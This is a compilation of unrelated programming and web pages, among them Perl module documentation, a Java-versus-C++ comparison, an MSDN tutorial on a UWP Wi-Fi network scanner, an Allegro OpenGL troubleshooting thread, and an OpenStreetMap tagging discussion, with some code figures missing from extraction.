- Date created: Aug 25, 2011
- Last updated: Aug 25, 2011

Comment: The JavaDocs link is dead. Please update.
http://dev.bukkit.org/bukkit-plugins/hawkeye/pages/other-information/api-for-other-plugins/
An array variable holds a single list value (a list of zero or more scalar values). Array variable names are similar to scalar variable names, differing only in the initial character, which is an at sign (@) rather than a dollar sign ($). For example:

```perl
@fred  # the array variable @fred
@A_Very_Long_Array_Variable_Name
@A_Very_Long_Array_Variable_Name_that_is_different
```

Note that the array variable @fred is unrelated to the scalar variable $fred; Perl maintains separate namespaces for different types of things. The value of an array variable that has not yet been assigned is (), the empty list. An expression can refer to array variables as a whole, or it can examine and modify individual elements of the array.
https://www.oreilly.com/library/view/learning-perl-second/1565922840/1565922840_ch03-35363.html
- NAME - VERSION - SYNOPSIS - DESCRIPTION - DISCUSSION - USAGE - BACKWARD COMPATIBILITY - SEE ALSO - AUTHOR - BUGS - ACKNOWLEDGEMENT - SUPPORT & CRITICS

NAME

Find::Lib - Helper to smartly find libs to use in the filesystem tree

VERSION

Version 1.01

SYNOPSIS

```perl
#!/usr/bin/perl -w
use strict;

## simple usage
use Find::Lib '../mylib';

## more libraries
use Find::Lib '../mylib', 'local-lib';

## more verbose, and backward compatible with Find::Lib < 1.0
use Find::Lib libs => [ 'lib', '../lib', 'devlib' ];

## resolve some paths with minimum typing
$dir  = Find::Lib->catdir("..", "data");
$path = Find::Lib->catfile("..", "data", "test.yaml");
$base = Find::Lib->base;  # or $base = $Find::Lib::Base;
```

DESCRIPTION

The purpose of this module is to replace

```perl
use FindBin;
use lib "$FindBin::Bin/../bootstrap/lib";
```

with something shorter. This is especially useful if your project has a lot of scripts (for instance, test scripts):

```perl
use Find::Lib '../bootstrap/lib';
```

The important differences between FindBin and Find::Lib are:

symlinks and '..'

If you have symlinks in your path, Find::Lib respects them, so basically you can forget you have symlinks: Find::Lib will do the natural thing (NOT ignore them) and resolve '..' correctly. FindBin breaks if you do `use lib "$Bin/../lib";` while you are currently in a symlinked directory, because $Bin resolves to the filesystem path (without the symlink) and not the shell path.

convenience

It's faster to type, and more intuitive (exporting $Bin always felt weird to me).

DISCUSSION

Installation and availability of this module

The usefulness of this module is seriously reduced if Find::Lib is not already in your @INC / $ENV{PERL5LIB} -- a chicken-and-egg problem. This is the big advantage of FindBin over Find::Lib: FindBin is distributed with Perl. To mitigate that, you need to be sure of the global availability of the module on the system (you could install it via your favorite package management system, for instance).
modification of $0 and chdir (BEGIN blocks, other 'use')

As soon as Find::Lib is compiled, it saves the location of the script and the initial cwd (current working directory), which are the two pieces of information the module relies on to interpret the relative path given by the calling program. If one of cwd, $ENV{PWD} or $0 is changed before Find::Lib has a chance to do its job, then Find::Lib will most probably die, saying "The script cannot be found". I don't know of a workaround for that, so be sure to load Find::Lib as soon as possible in your script to minimize problems (you are in control!). (Some programs alter $0 to customize the display line of the process in the system process list, such as ps on Unix; see perlvar for an explanation of $0.)

USAGE

import

All the work is done in import, so you need to 'use Find::Lib' and pass a list of paths to add to @INC. See the "BACKWARD COMPATIBILITY" section for more details on this topic. The paths given should be relative to the location of the current script. The paths won't be added unless they actually exist on disk.

base

Returns the detected base (the directory the script lives in). It's a string, and is the same as $Find::Lib::Base.

catfile

A shortcut to File::Spec::catfile using Find::Lib's base.

catdir

A shortcut to File::Spec::catdir using Find::Lib's base.

BACKWARD COMPATIBILITY

In versions < 1.0 of Find::Lib, the import arguments allowed you to specify a Bootstrap package. This option is now removed, breaking backward compatibility. I'm sorry about that, but that was a dumb idea of mine to save more typing; it saved, like, 3 characters at the expense of readability. So I'm fairly sure I didn't break anybody, because probably no one was relying on such a strange behaviour. However, the multiple-libs argument passing is kept intact; you can still use:

```perl
use Find::Lib libs => [ 'a', 'b', 'c' ];
```

where libs is a reference to a list of paths to add to @INC.
The short form implies that the first argument passed to import is not libs or pkgs. An example of its usage is given in the SYNOPSIS section.

SEE ALSO

FindBin, FindBin::libs, lib, rlib, local::lib

AUTHOR

Yann Kerherve, <yann.kerherve at gmail.com>

BUGS

Please report any bugs or feature requests to bug-find-lib at rt.cpan.org, or through the web interface at. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.

ACKNOWLEDGEMENT

Six Apart hackers nourished the discussion that led to this module's creation. Thanks to Jonathan Steinert (hachi) for doing all the conception of the 0.03 shell expansion mode with me.

SUPPORT & CRITICS

I welcome feedback about this module; don't hesitate to contact me regarding this module, its usage or its code. You can find documentation for this module with the perldoc command: perldoc Find::Lib.
https://metacpan.org/pod/release/YANNK/Find-Lib-1.04/lib/Find/Lib.pm
- XML design, part 1: compiler integration
Thu, 2009-12-10, 18:23

There is a close relationship between the Scala compiler and XML literals. The compiler recognises the type and content of literals during value assignment and during pattern matching. The XML vocabulary is widely understood by the compiler.

Literals for value assignment:
- XML declaration (<?xml ... ?>) is recognised as a processing instruction. This compiles, but leads to a runtime error.
- Elements, attributes and namespaces are recognised. Ok.
- Start of CDATA: ok. End of CDATA: if missing, no error message.
- Well-formedness is recognised. Ok.
- Processing instructions are recognised. Ok.
- Entities are recognised. Ok.

Literals for patterns within a match construct:
- XML declaration will not compile.
- Elements and namespaces are recognised. Ok. There are discussions about the correctness of namespace evaluation; see bug #2156.
- Attributes will not compile: see bug #2156.
- CDATA will not compile. Ok.
- Well-formedness is recognised. Ok.
- Processing instructions will not compile.
- Entities are recognised in the compilation phase, but lead to wrong results during execution.

One additional note: the "\" and "\\" operators are methods of scala.xml.NodeSeq; they are not a compiler feature.

My feeling is that the actual state (2.7.7) of the XML support in the Scala compiler is not perfect, but good enough for the near and mid-term future. In combination with the "\" and "\\" operators, many people can easily solve simple tasks.

Cheers, Jürgen
http://www.scala-lang.org/old/node/4493
31 May 2012 04:29 [Source: ICIS news]

SINGAPORE (ICIS)--TPI Polene's 158,000 tonne/year ethylene vinyl acetate/low density polyethylene (EVA/LDPE) swing plant in Map Ta Phut, Thailand, has been shut for maintenance, according to a company source.

The plant was taken off line on 26 May after some deferment in schedule because of delays in the delivery of a spare part required for the maintenance, the source said. "The shutdown will take around 10 to 15 days," he said, although the exact restart schedule could not be confirmed yet.

Corp and DuPont-Mitsui Polychemicals; China's BASF-YPC, Beijing Organic, DuPont Packaging & Industrial Polymers, and; The Polyolefin Co
http://www.icis.com/Articles/2012/05/31/9565679/thai-tpi-polenes-map-ta-phut-eva-plant-shut-for-maintenance.html
B: Comparing C++ and Java

- Java has both kinds of comments, like C++ does.
- Everything must be in a class. There are no global functions or global data. If you want the equivalent of globals, make static methods and static data within a class. There are no structs or enumerations or unions, only classes.
- All method definitions are defined in the body of the class. Thus, in C++ it would look like all the functions are inlined, but they're not (inlines are noted later).
- Class definitions are roughly the same form in Java as in C++, but there's no closing semicolon. There are no class declarations of the form class foo, only class definitions.

```java
class aType {
  void aMethod() { /* method body */ }
}
```

- Type checking and type requirements are much tighter in Java:
  1. Conditional expressions can be only boolean, not integral.
  2. The result of an expression like X + Y must be used; you can't just say "X + Y" for the side effect.
- The char type uses the international 16-bit Unicode character set, so it can automatically represent most national characters.
- Static quoted strings are automatically converted into String objects. There is no independent static character array string like there is in C and C++.
- Java adds the triple right shift >>> to act as a "logical" right shift by inserting zeroes at the top end; the >> inserts the sign bit as it shifts (an "arithmetic" shift).
- An array is a first-class object, with all of the methods commonly available to all other objects.
- All objects of non-primitive types can be created only via new. There's no equivalent of creating non-primitives "on the stack" as in C++.
- No forward declarations are necessary in Java. If you want to use a class or a method before it is defined, you simply use it; the compiler ensures that the appropriate definition exists. Thus you don't have any of the forward-referencing issues that you do in C++.
- Java has no preprocessor. If you want to use classes in another library, you say import and the name of the library. There are no preprocessor-like macros.
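The points above about object creation can be seen in a tiny program; a minimal self-contained sketch:

```java
public class Main {
    public static void main(String[] args) {
        int n = 42;                      // primitive: lives "on the stack," no new required
        String s = new String("howdy");  // non-primitive: created only via new, yielding a reference
        System.out.println(n);
        System.out.println(s);
    }
}
```

(In practice `String s = "howdy";` is preferred; the explicit `new` just makes the point about non-primitive creation.)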
- Object handles defined as class members are automatically initialized to null. Initialization of primitive class data members is guaranteed in Java; if you don't explicitly initialize them, they get a default value (a zero or equivalent). You can initialize them explicitly, either when you define them in the class or in the constructor. The syntax makes more sense than that for C++, and is consistent for static and non-static members alike. You don't need to externally define storage for static members like you do in C++.
- There are no Java pointers in the sense of C and C++. When you create an object with new, you get back a reference (which I've been calling a handle in this book). For example:

```java
String s = new String("howdy");
```

However, unlike C++ references, which must be initialized when created and cannot be rebound to a different location, Java references don't have to be bound at the point of creation, and they can be rebound at will, which eliminates part of the need for pointers. The other reason for pointers in C and C++ is the ability to point at any place in memory, which is what makes them unsafe and why Java doesn't support them. Pointers are often seen as an efficient way to move through an array of primitive variables; Java arrays allow you to do that in a safer fashion. The ultimate solution for pointer problems is native methods (discussed in Appendix A). Passing pointers to methods isn't a problem, since there are no global functions, only classes, and you can pass references to objects. The Java language promoters initially said "No pointers!", but when many programmers questioned how you can work without pointers, the promoters began saying "Restricted pointers." You can make up your mind whether it's "really" a pointer or not. In any event, there's no pointer arithmetic.
- Java has constructors that are similar to constructors in C++. You get a default constructor if you don't define one, and if you define a non-default constructor, there's no automatic default constructor defined for you, just like in C++. There are no copy constructors, since all arguments are passed by reference.
- There are no destructors in Java.
There is no "scope" of a variable per se to indicate when the object's lifetime ends; the lifetime of an object is determined instead by the garbage collector. There is a finalize() method that is called by the garbage collector, something like a destructor, but because Java doesn't support destructors, you must be careful to create a cleanup method if it's necessary, and to explicitly call all the cleanup methods for the base class and member objects in your class.
- Java has method overloading that works virtually identically to C++ function overloading.
- Java does not support default arguments.
- There's no goto in Java. The one unconditional jump mechanism is the break label or continue label, which is used to jump out of the middle of multiply-nested loops.
- The new collections in Java 1.2 are more complete than the earlier collection classes, but still don't match everything in the C++ STL.
- Java has built-in multithreading support. You're still responsible for implementing more sophisticated synchronization between threads by creating your own "monitor" class. Recursive synchronized methods work correctly. Time slicing is not guaranteed between equal-priority threads.
- Without an explicit access specifier, a class member is "friendly," meaning it is accessible to other elements in the same package (equivalent to them all being C++ friends) but inaccessible outside the package. The class, and each method within the class, has an access specifier to determine its visibility. There is no access level that means "accessible to inheritors only" (private protected used to do this, but the use of that keyword pair was removed).
- Nested classes. In C++, nesting a class is an aid to name hiding and code organization (but C++ namespaces eliminate the need for name hiding). Java packaging provides the equivalence of namespaces, so that isn't an issue. Java 1.1 has inner classes, which keep a handle to the enclosing object and so can do some of the jobs pointers to members do in C++.
- Because of the inner classes described in the previous point, there are no pointers to members in Java.
- No inline methods. The Java compiler might decide on its own to inline a method, but you don't have much control over this. You can suggest inlining in Java by using the final keyword for a method.
However, inline functions are only suggestions to the C++ compiler as well.
- Inheritance in Java has the same effect as in C++, but the syntax is different. There's no explicit constructor-initializer list like in C++, but the compiler forces you to perform all base-class initialization at the beginning of the constructor body, and it won't let you perform it later in the body.
- Inheritance in Java doesn't change the protection level of the members in the base class; you cannot specify public, private or protected inheritance as you can in C++. Also, an overridden method in a derived class cannot reduce the access of the base-class method (the compiler checks for this).
- Java provides the interface keyword, which creates the equivalent of an abstract base class filled with method declarations and no data members. An abstract class may contain abstract methods (although it isn't required to contain any), but it is also able to contain implementations, so it is restricted to single inheritance. Together with interfaces, this scheme prevents the need for some mechanism like virtual base classes in C++. To create a version of the interface that can be instantiated, use the implements keyword, whose syntax looks like inheritance:

```java
public interface Face {
  public void smile();
}

public class Baz extends Bar implements Face {
  public void smile() {
    System.out.println("a warm smile");
  }
}
```

- There's no virtual keyword in Java because all non-static methods always use dynamic binding. In Java, the programmer doesn't have to decide whether to use dynamic binding. The reason virtual exists in C++ is so you can leave it off for a slight increase in efficiency when you're tuning for performance (or, put another way, "If you don't use it, you don't pay for it").
- Java doesn't provide multiple inheritance (MI), at least not in the same sense that C++ does. Like protected, MI seems like a good idea, but you know you need it only when you are face to face with a certain design problem. Since Java uses a singly rooted hierarchy, you'll probably run into fewer situations in which MI is necessary. The interface keyword takes care of combining multiple interfaces.
- Run-time type identification functionality is quite similar to that of C++. Although Java doesn't have the benefit of easy location of casts as in the C++ "new casts," Java checks usage and throws exceptions, so it won't allow bad casts like C++ does.
- Exception handling in Java is different because there are no destructors.
A finally clause can be added to force execution of statements that perform necessary cleanup. All exceptions in Java are inherited from the base class Throwable, so you're guaranteed a common interface.

```java
public void f(Obj b) throws IOException {
  myresource mr = b.createResource();
  try {
    mr.UseResource();
  } catch (MyException e) {
    // handle my exception
  } catch (Throwable e) {
    // handle all other exceptions
  } finally {
    mr.dispose(); // special cleanup
  }
}
```

- Java has method overloading, but no operator overloading. The String class does use the + and += operators to concatenate strings, and String expressions use automatic type conversion, but that's a special built-in case.
- There's no copy constructor that's automatically called (see Chapter 12). To create a compile-time constant value, you say, for example:

```java
static final int SIZE = 255;
static final int BSIZE = 8 * SIZE;
```

- Because of security issues, programming an "application" is quite different from programming an "applet." A significant issue is that an applet won't let you write to the local disk.
- Java 1.1 includes the Java Beans standard, which is a way to create components that can be used in visual programming environments. This promotes visual components that can be used under all vendors' development environments, since you aren't tied to a particular vendor's component scheme.
- Java checks for the use of a null handle and throws an exception; the check doesn't have to occur right before the use of a handle, as the Java specification just says that the exception must somehow be thrown. Many C++ runtime systems can also throw exceptions for bad pointers.
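The special-cased String + and += operators mentioned above, including the automatic conversion of non-String operands, can be seen in a couple of lines; a minimal self-contained sketch:

```java
public class Main {
    public static void main(String[] args) {
        // + on String is the one built-in "operator overload" in Java;
        // the int operand 42 is converted to a String automatically
        String s = "value: " + 42;
        s += "!";  // += concatenates as well
        System.out.println(s);
    }
}
```

No user-defined class can define such operators; this behavior is reserved for String.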
https://www.codeguru.com/java/tij/tij0198.shtml
[Modern Apps] Build a Wi-Fi Scanner in the UWP By Frank La Vigne | July 2016 | Get the Code Wi-Fi has over the last decade or so become ubiquitous. Many shops and cafes offer free Wi-Fi to customers for their convenience. Virtually all hotels offer some kind of wireless Internet to their guests. Most of us have wireless networks at home. As few tablets and mobile devices have Ethernet jacks, Wi-Fi has become integral to our modern lives. Beyond that, we rarely give it much thought. So, questions abound. What about the sheer volume of Wi-Fi networks around us? How many are there? Are they secured? What channel are they on? What are they named? Can we map them? What can we learn from Wi-Fi network metadata? While walking my dogs recently, I happened to glance at my phone’s Wi-Fi network connection screen and noticed some witty network names. This got me to wonder how many others had chosen to be comical versus practical. Then, I had the idea to map out and scan wireless networks in and around my neighborhood. If I could automate the process, I could even scan and map wireless networks during my commute to work. Ideally, I could have a program running on a Raspberry Pi that would periodically scan wirelessly and record that data to a Web service. This certainly would be more practical than glancing at my phone intermittently. As it turns out, the Universal Windows Platform (UWP) provides rich access to wireless network data via classes in the Windows.Devices.WiFi namespace. As you know, a UWP app can run not only on phones and PCs, but on Raspberry Pi 2 running Windows 10 IoT Core. Now, I had all I needed to build out my project. In this column, I’ll explore the basics of scanning Wi-Fi networks using the APIs built right into the UWP. Windows.Devices.WiFi Namespace The classes inside the Windows.Devices.WiFi namespace contain everything needed to scan and explore wireless adapters and wireless networks within range. 
After creating a new UWP project in Visual Studio, add a new class called WifiScanner and add the following property:

Because it's possible to have multiple Wi-Fi adapters on a given system, you must pick the Wi-Fi adapter you want to use. The InitializeFirstAdapter method gets the first one enumerated in the system, as shown in Figure 1.

```csharp
private async Task InitializeFirstAdapter()
{
  var access = await WiFiAdapter.RequestAccessAsync();
  if (access != WiFiAccessStatus.Allowed)
  {
    throw new Exception("WiFiAccessStatus not allowed");
  }
  else
  {
    var wifiAdapterResults =
      await DeviceInformation.FindAllAsync(WiFiAdapter.GetDeviceSelector());
    if (wifiAdapterResults.Count >= 1)
    {
      this.WiFiAdapter = await WiFiAdapter.FromIdAsync(wifiAdapterResults[0].Id);
    }
    else
    {
      throw new Exception("WiFi Adapter not found.");
    }
  }
}
```

Adding the Wi-Fi Capability

You might notice that there's a check for access to the Wi-Fi and that the code throws an exception if RequestAccessAsync doesn't return Allowed. This is because the app needs to have a device capability to let it scan and connect to Wi-Fi networks. This capability isn't listed in the Capabilities tab in the manifest properties editor. To add this capability, right-click on the Package.appxmanifest file and choose View Code. You'll now see the raw XML of the Package.appxmanifest file. Inside the Capabilities node, add the following code:

Now save the file. Your app now has permission to access the Wi-Fi APIs.

Exploring Wireless Networks

With the code to identify a Wi-Fi adapter to work with and permission to access it, the next step is to actually scan for networks. Fortunately, the code to do that is fairly simple; it's just a call to the ScanAsync method on the WifiAdapter object. Add the following method to the WifiScanner class:

Once ScanAsync runs, the NetworkReport property of the WifiAdapter gets populated. NetworkReport is an instance of WiFiNetworkReport, which contains AvailableNetworks, a List<WiFiAvailableNetwork>.
The WiFiAvailableNetwork object contains numerous data points about a given network. You can find the Service Set Identifier (SSID), signal strength, encryption method and access point uptime, among other data points, all without connecting to the network. Iterating through the available networks is quite easy: you create a Plain Old CLR Object (POCO) to contain some of the data from the WiFiAvailableNetwork objects, as seen in the following code:

```csharp
ChannelCenterFrequencyInKilohertz = availableNetwork.ChannelCenterFrequencyInKilohertz,
NetworkKind = availableNetwork.NetworkKind.ToString(),
PhysicalKind = availableNetwork.PhyKind.ToString()
};
}
```

Building the UI

While I intend for the app to run without a UI in the final project, it's useful for development and troubleshooting to see the networks within range and the metadata associated with them. It's also useful for developers who might not have a Raspberry Pi at the moment, but still want to follow along. As shown in Figure 2, the XAML for the project is straightforward, and there's a multiline TextBox to store the output of the scan.

```xml
<Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
  <Grid.RowDefinitions>
    <RowDefinition Height="60"/>
    <RowDefinition Height="60"/>
    <RowDefinition Height="*"/>
  </Grid.RowDefinitions>
  <TextBlock FontSize="36" Grid.Row="0">WiFi Scanner</TextBlock>
  <StackPanel Name="spButtons" Grid.Row="1">
    <Button Name="btnScan" Click="btnScan_Click">Scan For Networks</Button>
  </StackPanel>
  <TextBox Name="txbReport" TextWrapping="Wrap" AcceptsReturn="True" Grid.Row="2"></TextBox>
</Grid>
</Page>
```

Capturing Location Data

In order to provide additional value, each scan of the wireless network should also note the location of the scan. This will make it possible to provide interesting insights and data visualizations later. Fortunately, adding location to UWP apps is simple. You will, however, need to add the Location capability to your app.
You can do that by double-clicking on the Package.appxmanifest file in Solution Explorer, clicking on the Capabilities tab, and checking the Location checkbox in the Capabilities list. The following code will retrieve the location using the APIs built into the UWP:

Now that you have a location, you'll want to store the location data. Following is the WiFiPointData class, which stores location data along with information about networks found at the location:

```csharp
public class WiFiPointData
{
  public DateTimeOffset TimeStamp { get; set; }
  public double Latitude { get; set; }
  public double Longitude { get; set; }
  public double Accuracy { get; set; }
  public List<WiFiSignal> WiFiSignals { get; set; }

  public WiFiPointData()
  {
    this.WiFiSignals = new List<WiFiSignal>();
  }
}
```

At this point, it's important to note that unless your device has a GPS sensor, the app requires a Wi-Fi connection to the Internet in order to resolve location. Without an onboard GPS sensor, you'll have to have a mobile hotspot and make sure that your laptop or Raspberry Pi 2 is connected to it. This also means that the reported location will be less accurate. For more information on best practices for creating location-aware UWP apps, please refer to the Windows Dev Center article, "Guidelines for Location-Aware Apps," at bit.ly/1P0St0C.

Scanning Repeatedly

For a scanning-and-mapping-while-driving scenario, the app needs to periodically scan for Wi-Fi networks. To accomplish this, you'll need to use a DispatcherTimer to scan for Wi-Fi networks at regular intervals. If you're not familiar with how DispatcherTimer works, please refer to the documentation at bit.ly/1WPMFcp. It's important to note that a Wi-Fi scan can take up to several seconds, depending on your system. The following code sets up a DispatcherTimer to fire an event every 10 seconds, more than enough time for even the slowest system:

Every 10 seconds, the timer will run the code in the Timer_Tick method.
The following code scans for Wi-Fi networks and then appends the results to the TextBox in the UI:

Reporting Scan Results

As mentioned previously, once the ScanAsync method is called, the results of the scan are stored in a List<WiFiAvailableNetwork>. All it takes to get to those results is to iterate through the list. The code in Figure 3 does just that and places the results into an instance of the WiFiPointData class.

```csharp
NetworkKind = availableNetwork.NetworkKind.ToString(),
PhysicalKind = availableNetwork.PhyKind.ToString(),
Encryption = availableNetwork.SecuritySettings.NetworkEncryptionType.ToString()
};
wifiPoint.WiFiSignals.Add(wifiSignal);
}
```

In order to make the UI simple while still providing for rich data analysis, you can convert the WiFiPointData to Comma Separated Value (CSV) format and set the text of the TextBox in the UI. CSV is a relatively simple format that can be imported into Excel and Power BI for analysis. The code to convert WiFiPointData is shown in Figure 4.

```csharp
private StringBuilder CreateCsvReport(WiFiPointData wifiPoint)
{
  StringBuilder networkInfo = new StringBuilder();
  networkInfo.AppendLine("MAC,SSID,SignalBars,Type,Lat,Long,Accuracy,Encryption");
  foreach (var wifiSignal in wifiPoint.WiFiSignals)
  {
    networkInfo.Append($"{wifiSignal.MacAddress},");
    networkInfo.Append($"{wifiSignal.Ssid},");
    networkInfo.Append($"{wifiSignal.SignalBars},");
    networkInfo.Append($"{wifiSignal.NetworkKind},");
    networkInfo.Append($"{wifiPoint.Latitude},");
    networkInfo.Append($"{wifiPoint.Longitude},");
    networkInfo.Append($"{wifiPoint.Accuracy},");
    networkInfo.Append($"{wifiSignal.Encryption}");
    networkInfo.AppendLine();
  }
  return networkInfo;
}
```

Visualizing the Data

Naturally, I couldn't wait to set up my cloud service to display and visualize the data. Accordingly, I took the CSV data generated by the app and copied and pasted it into a text file. I then made sure to save the file with a .CSV extension. Next, I imported the data into Power BI Desktop.
Power BI Desktop is a free download from powerbi.microsoft.com that makes it easy to visualize and explore data. To import the data from the app, click on Get Data on the Power BI Desktop splash screen. On the following screen, choose CSV and then click Connect. In the file picker dialog, choose the CSV file with the data copied and pasted out of the app. Once that loads, you'll then see a list of fields on the right-hand side of the screen. While a full tutorial on Power BI Desktop is beyond the scope of this article, it doesn't take much skill to produce a visualization that shows the location of Wi-Fi networks, their SSIDs and the encryption protocols they employ, as shown in Figure 5.

Figure 5 Power BI Visualization of Data the Wi-Fi Scanner App Collected

Amazingly, about one-third of the networks are completely unencrypted. While some of these are guest networks set up at various businesses, some are not.

Practical Applications

While the original intent was merely to measure the technical savvy and wit of my neighbors, this project has some rather interesting practical uses. The ability to easily and automatically map Wi-Fi signal strength and location has interesting applications. What could a city do if each city bus were outfitted with an IoT device with this app running on it? Cities could measure the prevalence of Wi-Fi networks and correlate that data with neighborhood income data. Elected officials could then make informed policy decisions based on that data. If a community provides public Wi-Fi across town or in certain areas, then the signal strength could be measured in real time without the added cost of sending technicians around. Cities could also determine where unsecured networks were prevalent and create targeted awareness programs to increase community cyber security. On a smaller scale, the ability to quickly scan Wi-Fi network metadata comes in handy when setting up your own network.
Many routers offer users the chance to modify the channel on which they broadcast. A great example of this is an app called "Wi-Fi Analyzer" (bit.ly/25ovZ0Q), which, among other things, displays the strength and frequency of nearby wireless networks. This comes in handy when setting up a Wi-Fi network in a new location.

Wrapping Up

Copying and pasting text data from the UI will not scale. Furthermore, if the goal is to run the app on an IoT device without any type of display, then the app needs to send data to the cloud without any UI. In next month's column, you'll learn how to set up a cloud service to take in all this data. Additionally, you'll learn how to deploy the solution to a Raspberry Pi 2 running Windows IoT Core.

Jose Luis Manners

Modern Apps - Build a Wi-Fi Scanner in the UWP
It is a great help indeed. I was trying to find some good and reliable API in UWP for many days.
Jul 2, 2018

Modern Apps - Build a Wi-Fi Scanner in the UWP
For me this is not working with Visual Studio 2015 on Windows 10. Cannot run the project; it gives an error on deployment and null exceptions.
Jan 26, 2018

Modern Apps - Build a Wi-Fi Scanner in the UWP
I can't believe no one has posted on this yet! This is awesome! Thanks Frank!
Apr 27, 2017

Modern Apps - Build a Wi-Fi Scanner in the UWP
In this month's Modern Apps column, Frank La Vigne explores the basics of scanning Wi-Fi networks using the APIs built into the Universal Windows Platform. Read this article in the July issue of MSDN Magazine.
Jul 1, 2016
https://msdn.microsoft.com/magazine/mt736460
Hey guys, I've done a few small projects with Allegro before, nothing too intense, so it's quite possible that I'm missing a step or some info. glGenBuffers is throwing a good ole 'memory access error'. The debugger shows it to not be properly initialized. Correct me if I'm wrong here, but I'm using the ALLEGRO_OPENGL_3_0 flag, and this requires OpenGL 3.0 or greater. And 3.0 has VBOs. So am I missing something to properly initialize the GL function calls? Something similar to glewInit, perhaps?

Includes:

```cpp
#include <allegro5/allegro.h>
#include <allegro5/allegro_opengl.h>
```

Which I believe is all I need to include for OpenGL support in Allegro, correct?

Display creation (al_init is before this point and returns successfully):

```cpp
al_set_new_display_flags(ALLEGRO_OPENGL | ALLEGRO_OPENGL_3_0);
display = al_create_display(display_data.width, display_data.height);
```

Call to generate a buffer:

```cpp
GLuint vboNy;
glGenBuffers(1, &vboNy);
```

The runtime error occurs at the glGenBuffers call, and using MSVC's debugger shows that it isn't pointing to a valid location in memory where the function might exist. What steps am I missing to make glGenBuffers defined? Side note: glGenBuffersARB is also not valid currently.

Thanks for the prompt reply. Reference linked to:

```cpp
void glGenBuffers(GLsizei n, GLuint * buffers);
```

They are one and the same (as far as the receiving function is concerned):

```cpp
GLuint x;
&x;
// is equivalent, as an argument, to:
GLuint * x = new GLuint();
x;
// or
GLuint x[] = {0};
x;
```

They are all pointers to a GLuint / of type GLuint pointer. However, I tried anyway (pointer definitions):

```cpp
GLuint * vboNy = new GLuint();
glGenBuffers(1, vboNy);
```

This results in the same errors. Through MSVC's debugger again, glGenBuffers points to NULL:

```cpp
(glGenBuffers == NULL)     // true
std::cout << glGenBuffers; // 00000000
```

Thanks. edit: clarified a statement.

Similar code works on my end. Does your graphics card support OpenGL 3? Are the drivers up to date?
Running a GTX 670; drivers are updated, and I have had OpenGL 4 commands work outside of Allegro previously, in particular MultiDrawArraysIndirect. I noticed al_get_opengl_version in the docs (which I believe returns an int meant to be read as hex). And, what I believe to be odd, is this:

printf("VERSION %X", al_get_opengl_version()); // VERSION 0

However, it can't really be 0, because I've been successful in using OpenGL up until trying to move from vertex arrays stored CPU-side to buffers stored GPU-side.

Try calling al_set_current_opengl_context(display) before generating the VBO. How did you compile Allegro? Are you using the proper compiler runtime and, similarly, the proper libraries for that compiler runtime? This example works for me:

Result:
Version: 3000000
glGenBuffers == 5EEB4790

I downloaded the MSVC 11 precompiled binaries; at the time it was 5.0.8, but I see now a new stable release is out. I'm linking to allegro-5.0.8-monolith-md-debug.lib and have the equivalent .dll. I'll download the 5.0.9 source, build it, and see if that remedies the situation; I'll update this post with the result. Thanks.

(Edit: Also, I tried your suggestion with no luck, and your example produces the same result for me as I've been having. I feel like you're onto something with the whole Allegro setup thing. I thought I'd get away with being lazy and use some precompiled binaries, but something tells me building it locally will probably fix this.)

UPDATE: I built 5.0.9 from source using the MSVC 11 compiler. That didn't resolve the issue; it's still there. Maybe I should try 5.1.x, although I doubt that's the issue anymore. I also tried getting GLEW to play nice with Allegro (dirty, I know, but I'm running out of options) and couldn't get it to go. Not sure where to go from here; help/ideas are appreciated. Thanks.

UPDATE 2: It looks like it does, but just to be sure: Allegro does manage OpenGL extensions on Windows, correct?
UPDATE: I overwrote MS's GL*.h files with new ones of the equivalent version, and this solved it. I'm still not sure what happened (if they got corrupted or what) or how, but at least it's a thing of the past now. Thanks, guys.

The manual page on OpenGL with Allegro 5 gives you several ways to check for supported OpenGL extensions. Is glGenBuffers an extension? (I wouldn't know, as I have little experience with OpenGL.) And I thought I heard once upon a time that Allegro would give you the latest OpenGL just with the ALLEGRO_OPENGL flag (i.e. without ALLEGRO_OPENGL_3_0 needed). Also, the manual says you have to create an OpenGL context (read: an OpenGL Allegro display) BEFORE calling al_get_opengl_version. I assume the rest of the OpenGL functions may behave similarly.
https://www.allegro.cc/forums/print-thread/612666
Talk:Map features/Archive 1

This is an archive of older discussions on the Talk:Map Features page; if it grows too unwieldy it should be divided into several pages. Discussions that concern a specific topic that has a page of its own may be moved there, but a link to the moved discussion should be left here.

Archive 2006

This section contains discussions to which no further comments have been added since 2006. Archived 07:56, 6 June 2008 (UTC)

Compound words convention

There is some inconsistency in the way compound words are created; compare "pubcrawl" with "national_park". IMHO we should use camel case: pubCrawl and nationalPark.

- I agree we should be consistent, well spotted; we should also get the coders' views on the format. I'm concerned about the eventual size of the XML in terms of transfer, so some shorthand version of both keys and values might be beneficial, although for this page I think we should keep to plain English so that we can understand it better. Why not put the proposed actual keys and values in the XML format on separate keys & values pages? There's no reason why we should not devote a page to each one and link to each page from the table here. Blackadder 11:09, 17 Mar 2006 (UTC)

Version identifier for agreed tag names

Whatever is agreed should be labelled with some kind of version identifier so that clients can state that they expect data containing, say, "OSM-core-1.3" tags or "OSM-marine-1.0" tags or "Blackadder-Brum-3.2" tags or whatever.

- I fully intend to add my own personal keys and values so that I can use the final output in my own specific way. Client software for editing needs to support any key and value in terms of the editing process, as JOSM does now. For rendering, though, I see that each piece of software will either do something specific with certain core keys or will allow users to map keys and values to a user-defined schema in the client. Blackadder 11:09, 17 Mar 2006 (UTC)

80n 08:48, 17 Mar 2006 (UTC)

- Good feedback. Thanks.
Blackadder 11:09, 17 Mar 2006 (UTC)

Think globally & other thoughts

Just a few of my thoughts. I think there needs to be a greater effort to think globally. There are plenty of little examples of specifically British things that could make life difficult when transferred to other countries; the tag that stuck out for me was "Motorway". The problem is inferred data. It makes sense to infer data from existing tags, to reduce the file size for each entity and to reduce time and effort when the map is created. E.g., there are tags you can infer from "highway=motorway", such as speed limits (high and low), restricted traffic, etc., which become quite simply incorrect if that tag is used to describe a French Autoroute or German Autobahn. Also, there may be other data that is useful for a certain application and that could be inferred from other tags, but may not be explicitly specified. I think there should be a definition of all the tags that can be directly inferred from each tag (it might end up being a huge list), which would then be published (as part of the API) to be processed and mangled into whatever format the end application needs.

Firstly, the tags need to be generic in nature, so that a GPS using OpenStreetMap will not misinterpret a "motorway" appearing in another country, or be unable to find one because every country has its own tag based on its own road names (this would be bad). Also, someone needs to define exactly what the road categories relate to. I would suggest the following (or at least, this is what I think they mean compared to UK road types):

- Motorway: Motorway (though I don't like the key)
